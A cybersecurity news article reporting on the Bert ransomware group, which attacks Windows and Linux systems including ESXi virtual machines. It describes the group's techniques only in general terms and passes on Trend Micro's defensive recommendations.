A new ransomware group called Bert has recently come into the spotlight for launching fast and widespread cyberattacks across the globe. First spotted in April 2025, this group has already targeted multiple industries, including healthcare, technology, and event services, across regions like Asia, Europe, and North America.
What makes Bert different is its ability to attack both Windows and Linux systems. It’s rare for ransomware to hit both platforms so effectively, but Bert has clearly been built with cross-platform attacks in mind. This means organizations running different operating systems aren’t safe just by securing one side.
Security researchers at Trend Micro were among the first to report on this new group. According to them, Bert is surprisingly effective despite using relatively simple code. Instead of relying on complex malware, it uses straightforward techniques, but it’s the speed and precision of its attacks that make it so dangerous.
On Windows, Bert uses PowerShell loaders to download the ransomware payload. Before encrypting any files, it takes steps to disable security features like Microsoft Defender and the Windows firewall. It also tries to escalate privileges to gain full control over the machine. Once it’s in control, it encrypts the victim’s data and demands ransom.
On Linux systems, the attack is even more aggressive. Bert can run up to 50 threads at once, meaning it encrypts files in parallel, making the process extremely fast. It even attempts to shut down VMware ESXi virtual machines, which are commonly used by businesses for cloud services. This prevents the system from being recovered easily, increasing the pressure on the victim to pay the ransom.
Security experts have also noticed that the ransomware is being downloaded from IP addresses linked to Russian hosting infrastructure, although no direct link to a specific threat actor has been confirmed yet. Trend Micro tracks this campaign under the codename “Water Pombero,” while other security firms have referred to it simply as Bert.
One worrying part is that Bert attacks don’t seem to follow a clear pattern. Victims are spread across various industries and regions, making it difficult to predict where the group will strike next. That randomness adds another layer of challenge for defenders.
Even though the malware itself is not highly sophisticated, the speed and coverage of Bert’s attacks make it very effective. In some cases, Linux servers were encrypted so quickly that security teams couldn’t even respond before it was too late. That’s a major warning sign for anyone relying on outdated defenses or slow detection systems.
Trend Micro recommends that organizations update their endpoint detection tools, monitor PowerShell activity, and watch out for suspicious traffic coming from untrusted IP addresses. Backup systems should also be tested regularly, especially in virtual environments, to make sure recovery is possible in case of an attack.
If your company uses both Windows and Linux servers, you need to take this group seriously. Bert shows that cross-platform ransomware attacks are no longer rare, they’re here, and they’re moving fast.
For now, the best defense is a mix of timely patching, strong access control, and advanced monitoring tools that can detect suspicious behavior early. Once the encryption starts, it’s usually too late.
Bert may be using simple code, but it’s backed by smart strategy and serious intent. Cybercriminals are proving once again that speed and reach can be more dangerous than complexity.
Stay alert, and keep your security measures updated!
Source: Follow cybersecurity88 on X and LinkedIn for the latest cybersecurity news
